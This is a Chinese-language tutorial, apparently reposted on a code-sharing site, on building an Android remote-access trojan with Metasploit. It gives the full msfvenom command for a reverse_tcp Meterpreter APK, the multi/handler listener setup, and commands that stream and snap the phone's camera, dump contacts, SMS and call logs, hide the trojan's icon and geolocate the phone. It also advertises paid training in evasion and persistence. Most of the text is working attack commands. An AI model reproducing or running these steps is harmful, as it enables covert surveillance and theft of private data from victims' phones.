使用Kali的metasploit生成安卓APK木馬控制安卓手機


使用Kali的metasploit生成安卓APK木馬控制安卓手機

前提:在虛擬機里面安裝kali系統,再就是本機安裝一個夜神模擬器,和一個安卓5的環境

如果不會的話,可以報名跟我們學習,聯系方式hk007.cn

 

第一步:在終端輸入ip addr命令查看kali主機的IP地址

ip addr

我的kali主機IP地址為192.168.2.146   每個人的不一樣,靈活運用

 

 

第二步,輸入生成反彈木馬命令:

msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.2.146 lport=55555 R > /home/yxs.apk

注意了,命令ip地址必須跟你自己的kali主機IP地址保持一致

 

 

然后在kali系統的根路徑的home文件夾下面會出現一個apk文件,把虛擬機kali系統

里面的這個apk文件復制到本機,然后拖到夜神模擬器里面安裝並且運行。

 

 

第三步:啟動msfconsole,配置相關參數

msfconsole //啟動msfconsole
use exploit/multi/handler //加載模塊
set payload android/meterpreter/reverse_tcp //選擇Payload
set lhost 192.168.2.146 //這里的地址設置成我們剛才生成木馬的IP地址
set lport 55555
exploit //開始執行漏洞 開始監聽,等待手機上線

 

第四步:點一下夜神模擬器上面的MainActivity程序(即安卓遠控木馬),我們

會在kali里面發現有主機上線了。

 

 

第五步:使用各種命令開始操控手機,那我們都可以做些什么呢?

5.1查看手機信息

sysinfo

 

 5.2查看手機有多少個攝像頭

webcam_list

 

 5.3開啟攝像頭

webcam_stream

 

 

 

 然后在kali系統中打開這個html文件,即可在線實時監控攝像頭畫面

 

 

 

 

 5.4導出電話號碼

dump_contacts

 

 5.5導出短信信息

dump_sms

5.6通過攝像頭拍照功能

webcam_snap

5.X其他命令大全

send_sms  //從目標會話發送短消息
webcam_snap //隱秘拍照功能
webcam_snap  //從指定的攝像頭獲取快照
check_root  //檢查設備是否有根
hide_app_icon
//隱藏手機端木馬程序圖標 dump_calllog //獲取通話記錄 geolocate //獲取手機的當前的經緯度 set_audio_mode //Set Ringer Mode sqlite_query //Query a SQLite database from storage wakelock // Enable/Disable Wakelock wlan_geolocate // Get current lat-long using WLAN information app_install // Request to install apk file app_list // List installed apps in the device app_run // Start Main Activty for package name app_uninstall //Request to uninstall application

 

后記:如果還是學不懂,可以報名參加培訓班,聯系方式hk007.cn

這一節只是最簡單的用法,還有更高級的frp穿透,開機自啟,安卓免殺等內容教學。

 


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM